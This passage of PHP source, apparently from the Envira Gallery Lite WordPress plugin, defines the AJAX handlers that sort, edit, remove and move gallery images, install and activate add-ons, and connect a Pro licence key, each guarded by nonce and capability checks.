Envira_Gallery_Common::get_instance()->flush_gallery_caches( $post_id ); // Return a HTML string comprising of all gallery images, so the UI can be updated. $html = ''; foreach ( (array) $gallery_data['gallery'] as $id => $data ) { $html .= Envira_Gallery_Metaboxes::get_instance()->get_gallery_item( $id, $data, $post_id ); } // Output JSON and exit. echo wp_json_encode( [ 'success' => $html ] ); die; } add_action( 'wp_ajax_envira_gallery_sort_images', 'envira_gallery_ajax_sort_images' ); /** * Sorts images based on user-dragged position in the gallery. * * @since 1.0.0 */ function envira_gallery_ajax_sort_images() { // Run a security check first. check_admin_referer( 'envira-gallery-sort', 'nonce' ); // Get the Envira Gallery ID. $post_id = isset( $_POST['post_id'] ) ? absint( wp_unslash( $_POST['post_id'] ) ) : null; if ( null === $post_id ) { wp_send_json_error( [ 'message' => esc_html__( 'Invalid Post ID.', 'envira-gallery-lite' ) ] ); } if ( ! current_user_can( 'edit_post', $post_id ) ) { wp_send_json_error( [ 'message' => esc_html__( 'You are not allowed to edit galleries.', 'envira-gallery-lite' ) ] ); } // Prepare variables. $order = isset( $_POST['order'] ) ? explode( ',', wp_unslash( $_POST['order'] ) ) : ''; // @codingStandardsIgnoreLine $gallery_data = get_post_meta( $post_id, '_eg_gallery_data', true ); // Copy the gallery config, removing the images // Stops config from getting lost when sorting + not clicking Publish/Update. $new_order = $gallery_data; unset( $new_order['gallery'] ); $new_order['gallery'] = []; // Loop through the order and generate a new array based on order received. foreach ( $order as $id ) { $new_order['gallery'][ $id ] = $gallery_data['gallery'][ $id ]; } // Update the gallery data. update_post_meta( $post_id, '_eg_gallery_data', $new_order ); // Flush the gallery cache. Envira_Gallery_Common::get_instance()->flush_gallery_caches( $post_id ); echo wp_json_encode( true ); die; } add_action( 'wp_ajax_envira_gallery_remove_image', 'envira_gallery_ajax_remove_image' ); /** * Removes an image from a gallery. * * @since 1.0.0 */ function envira_gallery_ajax_remove_image() { // Run a security check first. check_admin_referer( 'envira-gallery-remove-image', 'nonce' ); if ( ! current_user_can( 'edit_posts' ) ) { wp_send_json_error( [ 'message' => esc_html__( 'You are not allowed to edit galleries.', 'envira-gallery-lite' ) ] ); } // Prepare variables. $post_id = isset( $_POST['post_id'] ) ? absint( wp_unslash( $_POST['post_id'] ) ) : null; $attach_id = isset( $_POST['attachment_id'] ) ? absint( wp_unslash( $_POST['attachment_id'] ) ) : null; $gallery_data = get_post_meta( $post_id, '_eg_gallery_data', true ); $in_gallery = get_post_meta( $post_id, '_eg_in_gallery', true ); $has_gallery = get_post_meta( $attach_id, '_eg_has_gallery', true ); // Unset the image from the gallery, in_gallery and has_gallery checkers. unset( $gallery_data['gallery'][ $attach_id ] ); $key = array_search( $attach_id, (array) $in_gallery, true ); if ( false !== $key ) { unset( $in_gallery[ $key ] ); } $key = array_search( $post_id, (array) $has_gallery, true ); if ( false !== $key ) { unset( $has_gallery[ $key ] ); } // Update the gallery data. update_post_meta( $post_id, '_eg_gallery_data', $gallery_data ); update_post_meta( $post_id, '_eg_in_gallery', $in_gallery ); update_post_meta( $attach_id, '_eg_has_gallery', $has_gallery ); // Run hook before finishing the reponse. do_action( 'envira_gallery_ajax_remove_image', $attach_id, $post_id ); // Flush the gallery cache. Envira_Gallery_Common::get_instance()->flush_gallery_caches( $post_id ); echo wp_json_encode( true ); die; } add_action( 'wp_ajax_envira_gallery_remove_images', 'envira_gallery_ajax_remove_images' ); /** * Removes multiple images from a gallery. * * @since 1.3.2.4 */ function envira_gallery_ajax_remove_images() { // Run a security check first. check_admin_referer( 'envira-gallery-remove-image', 'nonce' ); // Get the Envira Gallery ID. $post_id = isset( $_POST['post_id'] ) ? absint( wp_unslash( $_POST['post_id'] ) ) : null; if ( null === $post_id ) { wp_send_json_error( [ 'message' => esc_html__( 'Invalid Post ID.', 'envira-gallery-lite' ) ] ); } if ( ! current_user_can( 'edit_post', $post_id ) ) { wp_send_json_error( [ 'message' => esc_html__( 'You are not allowed to edit galleries.', 'envira-gallery-lite' ) ] ); } // Prepare variables. $attach_ids = isset( $_POST['attachment_ids'] ) ? array_map( 'absint', wp_unslash( (array) $_POST['attachment_ids'] ) ) : []; $gallery_data = get_post_meta( $post_id, '_eg_gallery_data', true ); $in_gallery = get_post_meta( $post_id, '_eg_in_gallery', true ); foreach ( (array) $attach_ids as $attach_id ) { $has_gallery = get_post_meta( $attach_id, '_eg_has_gallery', true ); // Unset the image from the gallery, in_gallery and has_gallery checkers. unset( $gallery_data['gallery'][ $attach_id ] ); $key = array_search( $attach_id, (array) $in_gallery, true ); if ( false !== $key ) { unset( $in_gallery[ $key ] ); } $key = array_search( $post_id, (array) $has_gallery, true ); if ( false !== $key ) { unset( $has_gallery[ $key ] ); } // Update the attachment data. update_post_meta( $attach_id, '_eg_has_gallery', $has_gallery ); } // Update the gallery data. update_post_meta( $post_id, '_eg_gallery_data', $gallery_data ); update_post_meta( $post_id, '_eg_in_gallery', $in_gallery ); // Run hook before finishing the reponse. do_action( 'envira_gallery_ajax_remove_images', $post_id ); // Flush the gallery cache. Envira_Gallery_Common::get_instance()->flush_gallery_caches( $post_id ); echo wp_json_encode( true ); die; } add_action( 'wp_ajax_envira_gallery_save_meta', 'envira_gallery_ajax_save_meta' ); /** * Saves the metadata for an image in a gallery. * * @since 1.0.0 */ function envira_gallery_ajax_save_meta() { // Run a security check first. check_ajax_referer( 'envira-gallery-save-meta', 'nonce' ); // Get the Envira Gallery ID. $post_id = isset( $_POST['post_id'] ) ? absint( wp_unslash( $_POST['post_id'] ) ) : null; if ( null === $post_id ) { wp_send_json_error( [ 'message' => esc_html__( 'Invalid Post ID.', 'envira-gallery-lite' ) ] ); } if ( ! current_user_can( 'edit_post', $post_id ) ) { wp_send_json_error( [ 'message' => esc_html__( 'You are not allowed to edit galleries.', 'envira-gallery-lite' ) ] ); } // Prepare variables. $attach_id = isset( $_POST['attach_id'] ) ? absint( wp_unslash( $_POST['attach_id'] ) ) : null; $meta = isset( $_POST['meta'] ) ? array_map( 'sanitize_text_field', wp_unslash( (array) $_POST['meta'] ) ) : []; $gallery_data = get_post_meta( $post_id, '_eg_gallery_data', true ); // Prevent invalid data from being saved. if ( ! $post_id || ! $attach_id || empty( $meta['src'] ) ) { wp_send_json_error( 'Unable to save' ); } $wp_kses_allowed_html = [ 'a' => [ 'href' => [], 'target' => [], 'class' => [], 'title' => [], 'data-status' => [], 'data-envira-tooltip' => [], 'data-id' => [], ], 'br' => [], 'img' => [ 'src' => [], 'class' => [], 'alt' => [], ], 'div' => [ 'class' => [], ], 'li' => [ 'id' => [], 'class' => [], 'data-envira-gallery-image' => [], 'data-envira-gallery-image-model' => [], ], 'em' => [], 'span' => [ 'class' => [], ], 'strong' => [], ]; if ( isset( $meta['title'] ) ) { $gallery_data['gallery'][ $attach_id ]['title'] = trim( wp_kses( $meta['title'], $wp_kses_allowed_html ) ); } if ( isset( $meta['alt'] ) ) { $gallery_data['gallery'][ $attach_id ]['alt'] = trim( esc_html( $meta['alt'] ) ); } if ( isset( $meta['link'] ) ) { $gallery_data['gallery'][ $attach_id ]['link'] = esc_url( $meta['link'] ); } if ( isset( $meta['link_new_window'] ) ) { $gallery_data['gallery'][ $attach_id ]['link_new_window'] = trim( $meta['link_new_window'] ); } // Allow filtering of meta before saving. $gallery_data = apply_filters( 'envira_gallery_ajax_save_meta', $gallery_data, $meta, $attach_id, $post_id ); // Update the gallery data. update_post_meta( $post_id, '_eg_gallery_data', $gallery_data ); // Flush the gallery cache. Envira_Gallery_Common::get_instance()->flush_gallery_caches( $post_id ); // Done. wp_send_json_success(); die; } add_action( 'wp_ajax_envira_gallery_save_bulk_meta', 'envira_gallery_ajax_save_bulk_meta' ); /** * Saves the metadata for multiple images in a gallery (bulk edit). * * @since 1.4.2.2 */ function envira_gallery_ajax_save_bulk_meta() { // Run a security check first. check_admin_referer( 'envira-gallery-save-meta', 'nonce' ); // Get the Envira Gallery ID. $post_id = isset( $_POST['post_id'] ) ? absint( wp_unslash( $_POST['post_id'] ) ) : null; if ( null === $post_id ) { wp_send_json_error( [ 'message' => esc_html__( 'Invalid Post ID.', 'envira-gallery-lite' ) ] ); } if ( ! current_user_can( 'edit_post', $post_id ) ) { wp_send_json_error( [ 'message' => esc_html__( 'You are not allowed to edit galleries.', 'envira-gallery-lite' ) ] ); } // Prepare variables. $image_ids = isset( $_POST['image_ids'] ) ? wp_unslash( $_POST['image_ids'] ) : array(); // @codingStandardsIgnoreLine - Array $meta = isset( $_POST['meta'] ) ? wp_unslash( $_POST['meta'] ) : array(); // @codingStandardsIgnoreLine - Array // Check the required variables exist. if ( empty( $post_id ) ) { wp_send_json_error(); } if ( empty( $image_ids ) || ! is_array( $image_ids ) ) { wp_send_json_error(); } if ( empty( $meta ) || ! is_array( $meta ) ) { wp_send_json_error(); } // Get gallery. $gallery_data = get_post_meta( $post_id, '_eg_gallery_data', true ); if ( empty( $gallery_data ) || ! is_array( $gallery_data ) ) { wp_send_json_error(); } // Iterate through gallery images, updating the metadata. foreach ( $image_ids as $image_id ) { // If the image isn't in the gallery, something went wrong - so skip this image. if ( ! isset( $gallery_data['gallery'][ $image_id ] ) ) { continue; } // Update image metadata. if ( isset( $meta['title'] ) && ! empty( $meta['title'] ) ) { $gallery_data['gallery'][ $image_id ]['title'] = trim( $meta['title'] ); } if ( isset( $meta['alt'] ) && ! empty( $meta['alt'] ) ) { $gallery_data['gallery'][ $image_id ]['alt'] = trim( esc_html( $meta['alt'] ) ); } if ( isset( $meta['link'] ) && ! empty( $meta['link'] ) ) { $gallery_data['gallery'][ $image_id ]['link'] = esc_url( $meta['link'] ); } if ( isset( $meta['link_new_window'] ) && ! empty( $meta['link_new_window'] ) ) { $gallery_data['gallery'][ $image_id ]['link_new_window'] = trim( $meta['link_new_window'] ); } if ( isset( $meta['caption'] ) && ! empty( $meta['caption'] ) ) { $gallery_data['gallery'][ $image_id ]['caption'] = trim( $meta['caption'] ); } // Allow filtering of meta before saving. $gallery_data = apply_filters( 'envira_gallery_ajax_save_bulk_meta', $gallery_data, $meta, $image_id, $post_id ); } // Update the gallery data. update_post_meta( $post_id, '_eg_gallery_data', $gallery_data ); // Flush the gallery cache. Envira_Gallery_Common::get_instance()->flush_gallery_caches( $post_id ); // Done. wp_send_json_success(); die; } add_action( 'wp_ajax_envira_gallery_refresh', 'envira_gallery_ajax_refresh' ); /** * Refreshes the DOM view for a gallery. * * @since 1.0.0 */ function envira_gallery_ajax_refresh() { // Run a security check first. check_admin_referer( 'envira-gallery-refresh', 'nonce' ); if ( ! current_user_can( 'edit_posts' ) ) { wp_send_json_error( [ 'message' => esc_html__( 'You are not allowed to edit galleries.', 'envira-gallery-lite' ) ] ); } // Prepare variables. $post_id = isset( $_POST['post_id'] ) ? absint( wp_unslash( $_POST['post_id'] ) ) : null; $gallery = ''; // Grab all gallery data. $gallery_data = get_post_meta( $post_id, '_eg_gallery_data', true ); // If there are no gallery items, don't do anything. if ( empty( $gallery_data ) || empty( $gallery_data['gallery'] ) ) { echo wp_json_encode( [ 'error' => true ] ); die; } // Loop through the data and build out the gallery view. foreach ( (array) $gallery_data['gallery'] as $id => $data ) { $gallery .= Envira_Gallery_Metaboxes::get_instance()->get_gallery_item( $id, $data, $post_id ); } echo wp_json_encode( [ 'success' => $gallery ] ); die; } add_action( 'wp_ajax_envira_gallery_load_gallery_data', 'envira_gallery_ajax_load_gallery_data' ); /** * Retrieves and return gallery data for the specified ID. * * @since 1.0.0 */ function envira_gallery_ajax_load_gallery_data() { check_admin_referer( 'envira-gallery-load-gallery', 'nonce' ); $gallery_id = isset( $_POST['post_id'] ) ? absint( sanitize_key( $_POST['post_id'] ) ) : null; if ( ! current_user_can( 'edit_post', $gallery_id ) ) { wp_send_json_error( [ 'message' => esc_html__( 'You are not allowed to edit galleries.', 'envira-gallery-lite' ) ] ); } $gallery_data = get_post_meta( $gallery_id, '_eg_gallery_data', true ); // Send back the gallery data. echo wp_json_encode( $gallery_data ); die; } add_action( 'wp_ajax_envira_gallery_install_addon', 'envira_gallery_ajax_install_addon' ); /** * Installs an Envira addon. * * @since 1.0.0 */ function envira_gallery_ajax_install_addon() { // Run a security check first. check_admin_referer( 'envira-gallery-install', 'nonce' ); if ( ! current_user_can( 'install_plugins' ) ) { wp_send_json_error( [ 'message' => esc_html__( 'You are not allowed to install plugins.', 'envira-gallery-lite' ) ] ); } // Install the addon. if ( isset( $_POST['plugin'] ) ) { $download_url = esc_url_raw( wp_unslash( $_POST['plugin'] ) ); global $hook_suffix; // Set the current screen to avoid undefined notices. set_current_screen(); // Start output bufferring to catch the filesystem form if credentials are needed. ob_start(); $creds = request_filesystem_credentials( $url, $method, false, false, null ); if ( false === $creds ) { $form = ob_get_clean(); echo wp_json_encode( [ 'form' => $form ] ); die; } // If we are not authenticated, make it happen now. if ( ! WP_Filesystem( $creds ) ) { ob_start(); request_filesystem_credentials( $url, $method, true, false, null ); $form = ob_get_clean(); echo wp_json_encode( [ 'form' => $form ] ); die; } // We do not need any extra credentials if we have gotten this far, so let's install the plugin. require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php'; require_once plugin_dir_path( Envira_Gallery::get_instance()->file ) . 'includes/admin/skin.php'; // Create the plugin upgrader with our custom skin. $skin = new Envira_Gallery_Skin(); $installer = new Plugin_Upgrader( $skin ); $installer->install( $download_url ); // Flush the cache and return the newly installed plugin basename. wp_cache_flush(); if ( $installer->plugin_info() ) { $plugin_basename = $installer->plugin_info(); echo wp_json_encode( [ 'plugin' => $plugin_basename ] ); die; } } // Send back a response. echo wp_json_encode( true ); die; } add_action( 'wp_ajax_envira_gallery_activate_addon', 'envira_gallery_ajax_activate_addon' ); /** * Activates an Envira addon. * * @since 1.0.0 */ function envira_gallery_ajax_activate_addon() { // Run a security check first. check_admin_referer( 'envira-gallery-activate', 'nonce' ); if ( ! current_user_can( 'activate_plugins' ) ) { wp_send_json_error( [ 'message' => esc_html__( 'You are not allowed to activate plugins.', 'envira-gallery-lite' ) ] ); } // Activate the addon. if ( isset( $_POST['plugin'] ) ) { $activate = activate_plugin( wp_unslash( $_POST['plugin'] ) ); // @codingStandardsIgnoreLine if ( is_wp_error( $activate ) ) { echo wp_json_encode( [ 'error' => $activate->get_error_message() ] ); die; } } echo wp_json_encode( true ); die; } add_action( 'wp_ajax_envira_gallery_deactivate_addon', 'envira_gallery_ajax_deactivate_addon' ); /** * Deactivates an Envira addon. * * @since 1.0.0 */ function envira_gallery_ajax_deactivate_addon() { // Run a security check first. check_admin_referer( 'envira-gallery-deactivate', 'nonce' ); if ( ! current_user_can( 'activate_plugins' ) ) { wp_send_json_error( [ 'message' => esc_html__( 'You are not allowed to deactivate plugins.', 'envira-gallery-lite' ) ] ); } // Deactivate the addon. if ( isset( $_POST['plugin'] ) ) { $deactivate = deactivate_plugins( wp_unslash( $_POST['plugin'] ) ); // @codingStandardsIgnoreLine } echo wp_json_encode( true ); die; } /** * Helper function to prepare the metadata for an image in a gallery. * * @since 1.0.0 * * @param array $gallery_data Array of data for the gallery. * @param int $id The attachment ID to prepare data for. * @param array $image Attachment image. Populated if inserting from the Media Library. * @return array $gallery_data Amended gallery data with updated image metadata. */ function envira_gallery_ajax_prepare_gallery_data( $gallery_data, $id, $image = false ) { // Get attachment. $attachment = get_post( $id ); $url = wp_get_attachment_image_src( $id, 'full' ); $url_from_src = isset( $url[0] ) ? esc_url( $url[0] ) : ''; // Depending on whether we're inserting from the Media Library or not, prepare the image array. if ( ! $image ) { $alt_text = get_post_meta( $id, '_wp_attachment_image_alt', true ); $new_image = [ 'status' => 'active', 'src' => $url_from_src, 'title' => get_the_title( $id ), 'link' => $url_from_src, 'alt' => ! empty( $alt_text ) ? $alt_text : '', 'caption' => ! empty( $attachment->post_excerpt ) ? $attachment->post_excerpt : '', 'thumb' => '', ]; } else { $src = isset( $image['src'] ) ? $image['src'] : ( ! empty( $image['url'] ) ? $image['url'] : $url_from_src ); $link = isset( $image['link'] ) && wp_http_validate_url( $image['link'] ) ? $image['link'] : $src; $new_image = [ 'status' => 'active', 'src' => $src, 'title' => $image['title'], 'link' => $link, 'alt' => $image['alt'], 'caption' => $image['caption'], 'thumb' => '', ]; } // Allow Addons to possibly add metadata now. $image = apply_filters( 'envira_gallery_ajax_prepare_gallery_data_item', $new_image, $image, $id, $gallery_data ); // If gallery data is not an array (i.e. we have no images), just add the image to the array. if ( ! isset( $gallery_data['gallery'] ) || ! is_array( $gallery_data['gallery'] ) ) { $gallery_data['gallery'] = []; $gallery_data['gallery'][ $id ] = $image; } else { // Add image, this will default to the end of the array. $gallery_data['gallery'][ $id ] = $image; } // Filter and return. $gallery_data = apply_filters( 'envira_gallery_ajax_item_data', $gallery_data, $attachment, $id, $image ); return $gallery_data; } /** * Called whenever a notice is dismissed in Envira Gallery or its Addons. * * Updates a key's value in the options table to mark the notice as dismissed, * preventing it from displaying again * * @since 1.3.5 */ function envira_gallery_ajax_dismiss_notice() { // Run a security check first. check_admin_referer( 'envira-gallery-dismiss-notice', 'nonce' ); if ( ! current_user_can( 'edit_dashboard' ) ) { wp_send_json_error( [ 'message' => esc_html__( 'You are not allowed to dismiss notices.', 'envira-gallery-lite' ) ] ); } // Deactivate the notice. if ( isset( $_POST['notice'] ) ) { // Init the notice class and mark notice as deactivated. $notice = Envira_Gallery_Notice_Admin::get_instance(); $notice->dismiss( sanitize_text_field( wp_unslash( $_POST['notice'] ) ) ); echo wp_json_encode( true ); die; } // If here, an error occured. echo wp_json_encode( false ); die; } add_action( 'wp_ajax_envira_gallery_ajax_dismiss_notice', 'envira_gallery_ajax_dismiss_notice' ); add_action( 'wp_ajax_envira_gallery_ajax_dismiss_topbar', 'envira_gallery_ajax_dismiss_topbar' ); /** * Dismiss top bar * * @return void */ function envira_gallery_ajax_dismiss_topbar() { // Run a security check first. check_admin_referer( 'envira-gallery-dismiss-topbar', 'nonce' ); if ( ! current_user_can( 'edit_dashboard' ) ) { wp_send_json_error( [ 'message' => esc_html__( 'You are not allowed to dismiss notices.', 'envira-gallery-lite' ) ] ); } update_option( 'envira_pro_upgrade_header_dismissed', true ); wp_send_json_success(); } add_action( 'wp_ajax_envira_gallery_get_attachment_links', 'envira_gallery_get_attachment_links' ); /** * Returns the media link (direct image URL) for the given attachment ID * * @since 1.4.1.4 */ function envira_gallery_get_attachment_links() { // Check nonce. check_ajax_referer( 'envira-gallery-save-meta', 'nonce' ); if ( ! current_user_can( 'edit_posts' ) ) { wp_send_json_error( [ 'message' => esc_html__( 'You are not allowed to edit galleries.', 'envira-gallery-lite' ) ] ); } // Get required inputs. $attachment_id = isset( $_POST['attachment_id'] ) ? absint( wp_unslash( $_POST['attachment_id'] ) ) : null; // Return the attachment's links. wp_send_json_success( [ 'media_link' => wp_get_attachment_url( $attachment_id ), 'attachment_page' => get_attachment_link( $attachment_id ), ] ); } add_action( 'wp_ajax_envira_gallery_editor_get_galleries', 'envira_gallery_editor_get_galleries' ); /** * Returns Galleries, with an optional search term. * * @since 1.5.0 */ function envira_gallery_editor_get_galleries() { // Check nonce. check_admin_referer( 'envira-gallery-editor-get-galleries', 'nonce' ); if ( ! current_user_can( 'edit_posts' ) ) { wp_send_json_error( [ 'message' => esc_html__( 'You are not allowed to edit galleries.', 'envira-gallery-lite' ) ] ); } // Get POSTed fields. $search = isset( $_POST['search'] ) ? (bool) wp_unslash( $_POST['search'] ) : false; // @codingStandardsIgnoreLine $search_terms = isset( $_POST['search_terms'] ) ? sanitize_text_field( wp_unslash( $_POST['search_terms'] ) ) : ''; // @codingStandardsIgnoreLine $prepend_ids = isset( $_POST['prepend_ids'] ) ? stripslashes_deep( wp_unslash( $_POST['prepend_ids'] ) ) : array(); // @codingStandardsIgnoreLine $results = []; // Get galleries. $instance = Envira_Gallery_Lite::get_instance(); $galleries = $instance->get_galleries( false, true, ( $search ? $search_terms : '' ) ); // Build array of just the data we need. foreach ( (array) $galleries as $gallery ) { // Get the thumbnail of the first image. if ( isset( $gallery['gallery'] ) && ! empty( $gallery['gallery'] ) ) { // Get the first image. reset( $gallery['gallery'] ); $key = key( $gallery['gallery'] ); $thumbnail = wp_get_attachment_image_src( $key, 'thumbnail' ); } if ( ! empty( $gallery['config']['title'] ) ) { $gallery_title = $gallery['config']['title']; } else { $gallery_title = false; } // Check to make sure variables are there. $gallery_id = false; $gallery_config_slug = false; if ( isset( $gallery['id'] ) ) { $gallery_id = $gallery['id']; } if ( isset( $gallery['config']['slug'] ) ) { $gallery_config_slug = $gallery['config']['slug']; } // Add gallery to results. $results[] = [ 'id' => $gallery_id, 'slug' => $gallery_config_slug, 'title' => $gallery_title, 'thumbnail' => ( ( isset( $thumbnail ) && is_array( $thumbnail ) ) ? $thumbnail[0] : '' ), 'action' => 'gallery', // Tells the editor modal whether this is a Gallery or Album for the shortcode output. ]; } // If any prepended Gallery IDs were specified, get them now. // These will typically be a Defaults Gallery, which wouldn't be included in the above get_galleries() call. if ( is_array( $prepend_ids ) && count( $prepend_ids ) > 0 ) { $prepend_results = []; // Get each Gallery. foreach ( $prepend_ids as $gallery_id ) { // Get gallery. $gallery = get_post_meta( $gallery_id, '_eg_gallery_data', true ); // Get gallery first image. if ( isset( $gallery['gallery'] ) && ! empty( $gallery['gallery'] ) ) { // Get the first image. reset( $gallery['gallery'] ); $key = key( $gallery['gallery'] ); $thumbnail = wp_get_attachment_image_src( $key, 'thumbnail' ); } // Add gallery to results. $prepend_results[] = [ 'id' => $gallery['id'], 'slug' => $gallery['config']['slug'], 'title' => $gallery['config']['title'], 'thumbnail' => ( ( isset( $thumbnail ) && is_array( $thumbnail ) ) ? $thumbnail[0] : '' ), 'action' => 'gallery', // Tells the editor modal whether this is a Gallery or Album for the shortcode output. ]; } // Add to results. if ( is_array( $prepend_results ) && count( $prepend_results ) > 0 ) { $results = array_merge( $prepend_results, $results ); } } // Return galleries. wp_send_json_success( $results ); } add_action( 'wp_ajax_envira_gallery_move_media', 'envira_gallery_move_media' ); /** * Moves media (images) from one Gallery to another * * @since 1.5.0.3 */ function envira_gallery_move_media() { // Check nonce. check_admin_referer( 'envira-gallery-move-media', 'nonce' ); // Get the Envira Gallery ID. $from_gallery_id = isset( $_POST['from_gallery_id'] ) ? absint( wp_unslash( $_POST['from_gallery_id'] ) ) : null; if ( null === $from_gallery_id ) { wp_send_json_error( [ 'message' => esc_html__( 'Invalid Post ID.', 'envira-gallery-lite' ) ] ); } if ( ! current_user_can( 'edit_post', $from_gallery_id ) ) { wp_send_json_error( [ 'message' => esc_html__( 'You are not allowed to edit galleries.', 'envira-gallery-lite' ) ] ); } // Get POSTed fields. $to_gallery_id = isset( $_POST['to_gallery_id'] ) ? absint( $_POST['to_gallery_id'] ) : null; $image_ids = isset( $_POST['image_ids'] ) ? wp_unslash( $_POST['image_ids'] ) : array(); // @codingStandardsIgnoreLine if ( ! $from_gallery_id ) { wp_send_json_error( __( 'The From Gallery ID has not been specified.', 'envira-gallery-lite' ) ); } if ( ! $to_gallery_id ) { wp_send_json_error( __( 'The From Gallery ID has not been specified.', 'envira-gallery-lite' ) ); } if ( count( $image_ids ) === 0 ) { wp_send_json_error( __( 'No images were selected to be moved between Galleries.', 'envira-gallery-lite' ) ); } // Get from and to Galleries. $from_gallery = Envira_Gallery::get_instance()->get_gallery( $from_gallery_id ); $to_gallery = Envira_Gallery::get_instance()->get_gallery( $to_gallery_id ); // Iterate through each image ID, adding the image to $to_gallery, then removing from $from_gallery. foreach ( $image_ids as $image_id ) { // Check the image exists in $from_gallery. // If not, skip this image. if ( ! isset( $from_gallery['gallery'][ $image_id ] ) ) { continue; } // Copy the image to $to_gallery. $to_gallery['gallery'][ $image_id ] = $from_gallery['gallery'][ $image_id ]; // Remove the image from $from_gallery. unset( $from_gallery['gallery'][ $image_id ] ); } // Save both Galleries. update_post_meta( $from_gallery_id, '_eg_gallery_data', $from_gallery ); update_post_meta( $to_gallery_id, '_eg_gallery_data', $to_gallery ); // Return success. wp_send_json_success(); } add_action( 'wp_ajax_envira_activate_partner', 'envira_activate_partner' ); /** * Helper method to activate partner * * @since 1.90 * * @return void */ function envira_activate_partner() { // Run a security check first. check_admin_referer( 'envira-gallery-activate-partner', 'nonce' ); if ( ! current_user_can( 'activate_plugins' ) ) { wp_send_json_error( [ 'message' => esc_html__( 'You are not allowed to activate plugins.', 'envira-gallery-lite' ) ] ); } // Activate the addon. if ( isset( $_POST['basename'] ) ) { $activate = activate_plugin( sanitize_text_field( wp_unslash( $_POST['basename'] ) ) ); if ( is_wp_error( $activate ) ) { echo wp_json_encode( [ 'error' => $activate->get_error_message() ] ); die; } } echo wp_json_encode( true ); die; } add_action( 'wp_ajax_envira_deactivate_partner', 'envira_deactivate_partner' ); /** * Helper method to deactivate partner * * @since 1.90 * * @return void */ function envira_deactivate_partner() { // Run a security check first. check_admin_referer( 'envira-gallery-deactivate-partner', 'nonce' ); if ( ! current_user_can( 'activate_plugins' ) ) { wp_send_json_error( [ 'message' => esc_html__( 'You are not allowed to deactivate plugins.', 'envira-gallery-lite' ) ] ); } // Deactivate the addon. if ( isset( $_POST['basename'] ) ) { $deactivate = deactivate_plugins( wp_unslash( $_POST['basename'] ) ); // @codingStandardsIgnoreLine } echo wp_json_encode( true ); die; } add_action( 'wp_ajax_envira_install_partner', 'envira_install_partner' ); /** * Helper method to install partner * * @since 1.90 * * @return void */ function envira_install_partner() { check_admin_referer( 'envira-gallery-install-partner', 'nonce' ); if ( ! current_user_can( 'install_plugins' ) ) { wp_send_json_error( [ 'message' => esc_html__( 'You are not allowed to install plugins.', 'envira-gallery-lite' ) ] ); } // Install the addon. if ( isset( $_POST['download_url'] ) ) { $download_url = esc_url_raw( wp_unslash( $_POST['download_url'] ) ); global $hook_suffix; // Set the current screen to avoid undefined notices. set_current_screen(); $method = ''; $url = esc_url( admin_url( 'edit.php?post_type=envira&page=envira-gallery-lite-about-us' ) ); // Start output bufferring to catch the filesystem form if credentials are needed. ob_start(); $creds = request_filesystem_credentials( $url, $method, false, false, null ); if ( false === $creds ) { $form = ob_get_clean(); echo wp_json_encode( [ 'form' => $form ] ); die; } // If we are not authenticated, make it happen now. if ( ! WP_Filesystem( $creds ) ) { ob_start(); request_filesystem_credentials( $url, $method, true, false, null ); $form = ob_get_clean(); echo wp_json_encode( [ 'form' => $form ] ); die; } // We do not need any extra credentials if we have gotten this far, so let's install the plugin. require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php'; require_once plugin_dir_path( ENVIRA_LITE_FILE ) . 'includes/global/Installer_Skin.php'; // Create the plugin upgrader with our custom skin. $skin = new Envira_Lite_Installer_Skin(); $installer = new Plugin_Upgrader( $skin ); $installer->install( $download_url ); // Flush the cache and return the newly installed plugin basename. wp_cache_flush(); if ( $installer->plugin_info() ) { $plugin_basename = $installer->plugin_info(); $active = activate_plugin( $plugin_basename, false, false, true ); wp_send_json_success( [ 'plugin' => $plugin_basename ] ); die(); } } // Send back a response. echo wp_json_encode( true ); die; } add_action( 'wp_ajax_envira_connect', 'envira_connect' ); /** * Connects To Envira Gallery Pro * * @since 1.8.7 * * @return void */ function envira_connect() { // Run a security check. check_ajax_referer( 'envira_gallery_connect' ); if ( ! current_user_can( 'install_plugins' ) ) { wp_send_json_error( [ 'message' => esc_html__( 'You are not allowed to install plugins.', 'envira-gallery-lite' ) ] ); } $key = ! empty( $_POST['key'] ) ? sanitize_text_field( wp_unslash( $_POST['key'] ) ) : ''; if ( empty( $key ) ) { wp_send_json_error( [ 'message' => esc_html__( 'Please enter your license key to connect.', 'envira-gallery-lite' ) ] ); } $valid_key = envira_api_remote_request( 'verify-key', [ 'tgm-lite-key' => $key ] ); // If it returns false, send back a generic error message and return. if ( ! $valid_key ) { wp_send_json_error( [ 'message' => esc_html__( 'There was an error connecting to the remote key API. Please try again later.', 'envira-gallery-lite' ) ] ); } // If an error is returned, set the error and return. if ( ! empty( $valid_key->error ) ) { wp_send_json_error( [ 'message' => wp_kses_post( $valid_key->error ) ] ); } $option = get_option( 'envira_gallery' ); if ( ! is_array( $option ) ) { $option = []; } $option['key'] = $key; $option['type'] = isset( $valid_key->type ) ? $valid_key->type : $option['type']; $option['is_expired'] = false; $option['is_disabled'] = false; $option['is_invalid'] = false; update_option( 'envira_gallery', $option ); // Install addons from onboarding. $onboarding = ! empty( $_POST['onboarding'] ) && sanitize_text_field( wp_unslash( $_POST['onboarding'] ) ); if ( $onboarding ) { ( new OnboardingWizard() )->install_selected_addons( $key ); } $pro_path = trailingslashit( WP_PLUGIN_DIR ) . '/envira-gallery/envira-gallery.php'; if ( file_exists( $pro_path ) ) { $active = activate_plugin( 'envira-gallery/envira-gallery.php', false, false, true ); // Deactivate Lite. $plugin = plugin_basename( ENVIRA_LITE_FILE ); deactivate_plugins( $plugin ); do_action( 'envira_lite_plugin_deactivated', $plugin ); wp_send_json_success( [ 'message' => esc_html__( 'Congratulations! This site is now receiving automatic updates.', 'envira-gallery-lite' ), 'reload' => true, ] ); } if ( ! isset( $valid_key->download_url ) ) { wp_send_json_error( [ 'message' => esc_html__( 'There was an error connecting to the remote key API. Please try again later.', 'envira-gallery-lite' ) ] ); } $download_url = esc_url_raw( $valid_key->download_url ); // Start output bufferring to catch the filesystem form if credentials are needed. ob_start(); $method = ''; $url = esc_url( admin_url( 'edit.php?post_type=envira&page=envira-gallery-lite-about-us' ) ); $creds = request_filesystem_credentials( $url, $method, false, false, null ); if ( false === $creds ) { $form = ob_get_clean(); echo wp_json_encode( [ 'form' => $form ] ); die; } // If we are not authenticated, make it happen now. if ( ! WP_Filesystem( $creds ) ) { ob_start(); request_filesystem_credentials( $url, $method, true, false, null ); $form = ob_get_clean(); echo wp_json_encode( [ 'form' => $form ] ); die; } // We do not need any extra credentials if 